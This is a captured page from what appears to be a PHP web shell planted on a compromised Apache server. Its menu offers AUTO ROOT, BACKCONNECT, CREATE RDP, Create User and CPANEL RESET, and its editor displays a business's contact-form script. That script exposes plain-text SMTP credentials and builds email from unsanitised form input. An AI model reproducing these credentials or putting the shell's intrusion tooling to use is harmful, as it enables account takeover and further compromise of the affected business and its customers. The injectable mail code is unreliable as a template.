Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.204
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
thetds /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPMailer
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about.html
5.65
KB
-rw-r--r--
composer.phar
2.15
MB
-rw-r--r--
contact.html
6.63
KB
-rw-r--r--
index.php
77
B
-rw-r--r--
indexw.html
10.98
KB
-rw-r--r--
mail.php
5.34
KB
-rw-r--r--
thanks.html
4.92
KB
-rw-r--r--
thanks.php
5.2
KB
-rw-r--r--
thetds.net-le-ssl.conf
968
B
-rw-r--r--
thetds.net.conf
584
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mail.php
<?php require 'PHPMailer/PHPMailerAutoload.php'; $mail =new \PHPMailer(); $mail->isSMTP(); // Set mailer to use SMTP $mail->Host = "smtp.ionos.com"; // Specify main and backup SMTP servers $mail->SMTPAuth = true; // Enable SMTP authentication $mail->Username = "sales@tanagerdigitalsolutions.com"; // SMTP username $mail->Password = 'SI@v$p5vfi'; // SMTP password $mail->SMTPSecure = 'tls'; // Enable TLS encryption, `ssl` also accepted $mail->Port = 587; // TCP port to connect to $mail->setFrom('sales@tanagerdigitalsolutions.com', $_POST["first_name"]); $mail->addAddress('sales@tanagerdigitalsolutions.com', $_POST["first_name"]); // Add a recipient // $mail->addAddress('ellen@example.com'); // Name is optional // $mail->addReplyTo('info@example.com', 'Information'); // $mail->addCC('cc@example.com'); // $mail->addBCC('bcc@example.com'); // $mail->addAttachment('/var/tmp/file.tar.gz'); // Add attachments // $mail->addAttachment('/tmp/image.jpg', 'new.jpg'); // Optional name $mail->isHTML(true); // Set email format to HTML $mail->Subject = $_POST["subject"]; $mail->Body ="<!DOCTYPE html><html><head><style> .title_set{ background:#338dc7;color:white;padding:2px 2px 10px 2px;}</style> </head><body><div class=w3-container><div style=width:70%;> <p class=title_set style=text-align:center;>".$_POST["first_name"]."<br><a style=color:white !important; >" .$_POST["email"]."</a></p> <div style=text-align:center;><p>".$_POST["message"]."</p></div><p class=title_set style=text-align:center;>Phone no:".$_POST["phone_no"].</p></div></div></body></html>"; // $mail->AltBody = 'This is the body in plain text for non-HTML mail clients'; // echo $mail; // die; if(!$mail->send()) { //echo 'Message has been sent'; echo 'Mailer Error: ' . $mail->ErrorInfo; } else { $thankmail =new \PHPMailer(); $thankmail->isSMTP(); // Set mailer to use SMTP $thankmail->Host = "smtp.ionos.com"; // Specify main and backup SMTP servers $thankmail->SMTPAuth = true; // Enable SMTP authentication $thankmail->Username = "sales@tanagerdigitalsolutions.com"; // SMTP username $thankmail->Password = 'SI@v$p5vfi'; // SMTP password $thankmail->SMTPSecure = 'tls'; // Enable TLS encryption, `ssl` also accepted $thankmail->Port = 587; // TCP port to connect to $thankmail->setFrom('sales@tanagerdigitalsolutions.com', 'Tanager Digital Solutions'); $thankmail->addAddress($_POST["email"], $_POST["first_name"]); $thankmail->isHTML(true); // Set email format to HTML $thankmail->Subject ="DevBatch-Thank You for Your Inquery"; $thankmail->Body ="<!DOCTYPE html> <html> <head> <style> /* header,{ background:#338dc7; color:white; padding:2px; } */ </style> <link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'> </head> <div class=w3-container> <div style=width:100%;> <header style=text-align:left;> <body> <p>Hi Dear<br> WE HAVE RECEIVED YOUR QUOTATION FORM</p> <p>Our Representative will get back to you at our earliest</p> <h3>Thanks</h3> <footer> <h1 style =color:red;>Tanager Digital Solutions</h1> <p style = color:blue> <div style='width: 2%; float: left;'><img src=https://e7.pngegg.com/pngimages/657/288/png-clipart-mobile-phones-computer-icons-telephone-telefono-miscellaneous-text-thumbnail.png width=20px></div> <div style='width: 98%; float: left;'> CALL US: (0510) 500.9593</div> <div style='width: 100%; float: left;'> <a href = style ='color:blue; text-decoration:none;'><div style='width: 2%; float: left;'><img src=https://icon-library.com/images/black-email-icon-png/black-email-icon-png-19.jpg width=20px></div><div style='width: 98%; float: left;'> sales@tanagerdigitalsolutions.com</div></a></div> <div style='width: 100%; float: left;'><a href='http://tanagerdigitalsolutions.com' style=text-decoration:none><div style='width: 2%; float: left;'><img src=https://upload.wikimedia.org/wikipedia/commons/thumb/c/c4/Globe_icon.svg/1200px-Globe_icon.svg.png width=20px> </div> <div style='width: 98%; float: left;'> tanagerdigitalsolutions.com</div></a></div> </p> </body> </div> </div> </footer> </html>"; if(!$thankmail->send()) { //echo 'Message has been sent'; echo 'Mailer Error: ' . $mail->ErrorInfo; } else { header('Location: thanks.php'); } } ?>
Close